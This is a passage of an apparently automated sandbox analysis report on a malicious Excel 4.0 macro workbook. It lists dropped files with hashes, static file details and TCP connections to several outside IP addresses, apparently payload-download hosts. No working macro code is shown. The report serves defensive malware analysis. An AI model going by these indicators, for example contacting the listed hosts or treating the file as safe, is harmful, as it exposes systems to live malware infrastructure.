                                                                                                                                                    SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                    SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A7233E2C.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8301
                                                                                                                                                    Entropy (8bit):7.970711494690041
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                    MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                    SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                    SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                    SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\B9B40000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):95043
                                                                                                                                                    Entropy (8bit):7.883576148305342
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:K1+S6bj7lM+z3JFXmuKhIPeKF4PQSVzcTf2haw2bTWPtsmLMWzMNFOfhOJYS6xya:K1ojFjSVzcTfMeT0s+MWzYoUJixJR
                                                                                                                                                    MD5:0D0D1A7DD23BC24920E086576E507CBF
                                                                                                                                                    SHA1:626F3D54BF01283F3EC3487DE5689682353179A9
                                                                                                                                                    SHA-256:A8EEA7EE7F8580044BF95D4F562602B52B7E282CBE868B58DE13785E8CC13A2F
                                                                                                                                                    SHA-512:DB77B7351E5D7777B892168B330CDF693E4F91DDC43F75926030581D3B21DA471037B46F89EB6EC83C5189E4536A08E92270CE7F9F87082A27BCF7E37C6E129F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .U.N.0..#.....J\X .......|.kO..~.c..{.n(....Hl.r.&../..TO.Q{..f.*p.+.=....X.I8%.w.% ...9../.`E..[...9G......Vf>Z..6v<.9.....K...T...&.+..G....=^).j...{..e"...H$.?9.........|...`. ....&DM...R"c..F..O..f........9..Pe.........!.|..PwC..ZAu+b./,....?.8.z?o...0-..`..Xc......Z..*..T*....7(?~$.......:..A.u.|[....zC..../.N.........1-....]..b.E.u.hCw?..=...*..,.....>.m..v.}@....O.u...:...a=}6..5#M...y.+P..y..L^.......PK..........!...`.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\12345.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:52 2020, mtime=Tue Apr 6 06:55:13 2021, atime=Tue Apr 6 06:55:13 2021, length=95043, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2066
                                                                                                                                                    Entropy (8bit):4.701578850950561
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:8xWXiVej3AabMfkDJpL7aB6myxWXiVej3AabMfkDJpL7aB6m:8SiQjQaQM0B6pSiQjQaQM0B6
                                                                                                                                                    MD5:7DA57E2F8133F285FF79DA4278C5FDEA
                                                                                                                                                    SHA1:1BCE0426962E31C6CA1C18C03BD4A45FB74ED2CB
                                                                                                                                                    SHA-256:143F2CD2FB659C5A9D34987659BF491142F8490B760B18546F1DDEB4E4BF8CC3
                                                                                                                                                    SHA-512:412543211A447DB3310435550123FBB945FB0972B7DACFCCA19ED4D537F0514156E2EF9D404174E7FF072B7BB3B1821247844437912A0C2111E8C194AB1143F6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: L..................F.... ...,wBS.......-.*.....-.*..Cs...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.>....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.>....#J....................U...j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N...R.>.....Y..............>......9..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....`.2..u...R.> .12345~1.XLS.F......>Q{<.R.>.....V....................Ez..1.2.3.4.5...x.l.s.m.......P...............-.......O...........>.S......C:\Users\user\Desktop\12345.xlsm..!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.2.3.4.5...x.l.s.m.........:..,.LB.)...As...`.......X.......123716...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h...
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue Apr 6 06:55:13 2021, atime=Tue Apr 6 06:55:13 2021, length=12288, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):904
                                                                                                                                                    Entropy (8bit):4.653857077345807
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8jolKXUBduCH2KOMS4Dan+WrjAZ/DYbDJp5SeuSeL44t2Y+xIBjKZm:80tixxAZbcDJpP7aB6m
                                                                                                                                                    MD5:99355C2BE7EC5EB1D5E6E794479357B3
                                                                                                                                                    SHA1:247D4625E499B223A55E268E67E419AFE19CE3F9
                                                                                                                                                    SHA-256:5923048905BFC389717AD13EC4283AF23709BF4E845BD98742BC92D3767929FD
                                                                                                                                                    SHA-512:DB2B637772056711530C66694642696D1EBA32299C7F69DEDCE32630077A3CF78CF751497E1E0E05554FFB0FB23D07AF2158DF23762463268548061EDAA57FA4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: L..................F.............-...Z.,.*.....,.*...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.>....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.>....#J....................U...j.o.n.e.s.....~.1......R.>..Desktop.h.......N...R.>.....Y..............>.....q33.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......123716...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):70
                                                                                                                                                    Entropy (8bit):4.450013373778756
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:oyBVomxW/LprXC3QLprXCmxW/LprXCv:djALBIQLB+LBs
                                                                                                                                                    MD5:8D90BE2693870D9F8B85B2F981628B31
                                                                                                                                                    SHA1:F1EA8A5440EFA7E99E91415481FC9DD89EF0D2E7
                                                                                                                                                    SHA-256:AD0BDAAB996D0966EF9B85AED4713407724A2889AB06755E43E76103570E7AC9
                                                                                                                                                    SHA-512:7BE5A626FC0670A5A6BD1B3A50359072D9806736816FFFF0FF25CA244BC931AA5EF4D3B751081202FEAA863AC4A2C6551CF528965DFD7152125C8CABE01609B4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: Desktop.LNK=0..[misc]..12345.LNK=0..12345.LNK=0..[misc]..12345.LNK=0..
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22
                                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                    C:\Users\user\Desktop\FAB40000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):95043
                                                                                                                                                    Entropy (8bit):7.883576148305342
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:K1+S6bj7lM+z3JFXmuKhIPeKF4PQSVzcTf2haw2bTWPtsmLMWzMNFOfhOJYS6xya:K1ojFjSVzcTfMeT0s+MWzYoUJixJR
                                                                                                                                                    MD5:0D0D1A7DD23BC24920E086576E507CBF
                                                                                                                                                    SHA1:626F3D54BF01283F3EC3487DE5689682353179A9
                                                                                                                                                    SHA-256:A8EEA7EE7F8580044BF95D4F562602B52B7E282CBE868B58DE13785E8CC13A2F
                                                                                                                                                    SHA-512:DB77B7351E5D7777B892168B330CDF693E4F91DDC43F75926030581D3B21DA471037B46F89EB6EC83C5189E4536A08E92270CE7F9F87082A27BCF7E37C6E129F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .U.N.0..#.....J\X .......|.kO..~.c..{.n(....Hl.r.&../..TO.Q{..f.*p.+.=....X.I8%.w.% ...9../.`E..[...9G......Vf>Z..6v<.9.....K...T...&.+..G....=^).j...{..e"...H$.?9.........|...`. ....&DM...R"c..F..O..f........9..Pe.........!.|..PwC..ZAu+b./,....?.8.z?o...0-..`..Xc......Z..*..T*....7(?~$.......:..A.u.|[....zC..../.N.........1-....]..b.E.u.hCw?..=...*..,.....>.m..v.}@....O.u...:...a=}6..5#M...y.+P..y..L^.......PK..........!...`.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\Desktop\~$12345.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):330
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                    MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                    SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                    SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                    SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.884862176121338
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                    File name:12345.xlsm
                                                                                                                                                    File size:95672
                                                                                                                                                    MD5:5851c6423d6cffdbfdd9ce4276592acb
                                                                                                                                                    SHA1:8992a00647a35e67a887127b5aa7269cc9c597c6
                                                                                                                                                    SHA256:a7893081be92e7c0c1672482df252f282abca98ff09ff559f246bcc5244d74c3
                                                                                                                                                    SHA512:8a9510adb6020f887e4fa134fe8dc9df394bf055a7c596057ca92e582f72508da624c8072ad73488d8112b402360fcc4d1e4c381ecd247c06b450c17fcd737f3
                                                                                                                                                    SSDEEP:1536:Qb/ndoJz+kgpei9EM5fybX8dz+HAITWPtsmLMWzMNFOfhOJYS6xybsD9fe2hawZ+:QbpJ5fybX8dz+HzT0s+MWzYoUJixzWMo
                                                                                                                                                    File Content Preview:PK..........!...`.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "12345.xlsm"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Apr 6, 2021 09:55:14.431035042 CEST4973080192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:14.469472885 CEST80497308.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:14.469556093 CEST4973080192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:14.470207930 CEST4973080192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:14.551409960 CEST80497308.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:14.891041040 CEST80497308.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:14.891124964 CEST4973080192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:14.891271114 CEST80497308.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:14.891323090 CEST4973080192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:14.891416073 CEST4973080192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:14.929661989 CEST80497308.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:14.964786053 CEST4973280192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:15.003367901 CEST80497328.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:15.003482103 CEST4973280192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:15.004120111 CEST4973280192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:15.083641052 CEST80497328.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:15.408405066 CEST80497328.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:15.408639908 CEST4973280192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:15.408811092 CEST4973280192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:15.447252035 CEST80497328.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:15.779066086 CEST4973480192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:15.817545891 CEST80497348.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:15.817676067 CEST4973480192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:15.818351984 CEST4973480192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:15.899563074 CEST80497348.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.223596096 CEST80497348.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.223624945 CEST80497348.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.223752022 CEST4973480192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:16.223865986 CEST4973480192.168.2.48.211.4.209
                                                                                                                                                    Apr 6, 2021 09:55:16.262239933 CEST80497348.211.4.209192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.315769911 CEST4973580192.168.2.474.208.236.90
                                                                                                                                                    Apr 6, 2021 09:55:16.476035118 CEST804973574.208.236.90192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.476387978 CEST4973580192.168.2.474.208.236.90
                                                                                                                                                    Apr 6, 2021 09:55:16.477008104 CEST4973580192.168.2.474.208.236.90
                                                                                                                                                    Apr 6, 2021 09:55:16.637166023 CEST804973574.208.236.90192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.725126028 CEST804973574.208.236.90192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.725270033 CEST4973580192.168.2.474.208.236.90
                                                                                                                                                    Apr 6, 2021 09:55:16.726073980 CEST4973580192.168.2.474.208.236.90
                                                                                                                                                    Apr 6, 2021 09:55:16.730202913 CEST804973574.208.236.90192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.730330944 CEST4973580192.168.2.474.208.236.90
                                                                                                                                                    Apr 6, 2021 09:55:16.801307917 CEST4973680192.168.2.4103.205.143.227
                                                                                                                                                    Apr 6, 2021 09:55:16.889584064 CEST804973574.208.236.90192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.889693022 CEST4973580192.168.2.474.208.236.90
                                                                                                                                                    Apr 6, 2021 09:55:17.000811100 CEST8049736103.205.143.227192.168.2.4
